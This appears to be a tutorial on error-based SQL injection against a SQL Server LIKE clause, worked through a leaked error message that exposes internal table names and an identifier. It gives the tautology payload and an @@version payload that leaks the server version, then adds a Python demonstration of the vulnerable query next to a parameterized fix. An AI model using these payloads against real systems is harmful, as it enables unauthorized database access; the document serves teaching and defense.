Q: How do you handle a SQL injection point where the page returns a database error?
1. First, copy down part of the statement:
SELECT @Total=COUNT(1) FROM (select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%') T SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY FProcStatus ASC,FCreationDate DESC) AS RowNumber,* FROM ( select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%' ) AS N ) AS A WHERE A.RowNumber BETWEEN 1 AND 8 at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() at System.Data.SqlClient.SqlDataReader.get_MetaData() at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) at ...... (a very long SQL statement follows)
2. Faced with such a complex statement, where do you start? The statement above can be simplified so it is easier to analyze:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B'%') ...... (there is a lot more after this; it can be ignored)
Alright, now let's look at how to inject.
Using an always-true condition to perform the SQL injection:
(If you skip the always-true test and go straight to ' and 1=@@version+--, then with a statement this complex you break the logic of the whole SQL statement, the query fails to execute, and in the end you never get the version.)
1. What if the statement is very complex? Then reduce it to the statement below, so the complexity does not throw you off:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B%')
2. Insert the string %' and 1=1 and '%'=' ; this lets the statement concatenate cleanly without raising an error:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=1 and '%'='%')
3. Now make the move: change 1=1 to 1=@@version. The condition is no longer true, the database raises an error, and the error message leaks the database version:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=@@version and '%'='%')
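To show the defender's side of the pattern above, here is an added example that is not from the original post: it rebuilds the vulnerable LIKE concatenation next to the parameterized alternative in Python over an in-memory SQLite table (a constructed stand-in for TB_XZSQ_Apply, assumed here to have a single FFormSubTitle column), so the tautology payload can be seen to rewrite one query while being treated as plain text by the other. SQLite has no @@version, so the conversion-error step itself is not reproduced.

```python
import sqlite3

# Constructed sample data standing in for TB_XZSQ_Apply (assumption: only the
# FFormSubTitle column matters for this demonstration).
SAMPLE_ROWS = [
    ("Apply-A",),
    ("Budget-B",),
    ("Bonus-B2",),
    ("Other-C",),
]

# The tautology payload quoted in the post, reused unchanged as the test input.
PAYLOAD = "%' and 1=1 and '%'='"


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TB_XZSQ_Apply (FFormSubTitle TEXT)")
    conn.executemany("INSERT INTO TB_XZSQ_Apply VALUES (?)", SAMPLE_ROWS)
    return conn


def search_concatenated(user_input):
    """Vulnerable pattern from the post: the search term is spliced into the
    SQL text, so a quote in the input changes the statement's logic."""
    sql = ("SELECT * FROM (SELECT * FROM TB_XZSQ_Apply WHERE 1=1 "
           "AND FFormSubTitle LIKE '%" + user_input + "%')")
    return _connect().execute(sql).fetchall()


def search_parameterized(user_input):
    """Hardened form: the term travels as a bound parameter and the LIKE
    metacharacters in it are escaped, so it can only ever match as data."""
    escaped = (user_input.replace("\\", "\\\\")
                         .replace("%", "\\%")
                         .replace("_", "\\_"))
    sql = ("SELECT * FROM (SELECT * FROM TB_XZSQ_Apply WHERE 1=1 "
           "AND FFormSubTitle LIKE ? ESCAPE '\\')")
    return _connect().execute(sql, ("%" + escaped + "%",)).fetchall()


if __name__ == "__main__":
    print(len(search_concatenated("B")))        # 2: the intended search
    print(len(search_concatenated(PAYLOAD)))    # 4: WHERE clause was rewritten
    print(len(search_parameterized(PAYLOAD)))   # 0: payload matched as literal text
```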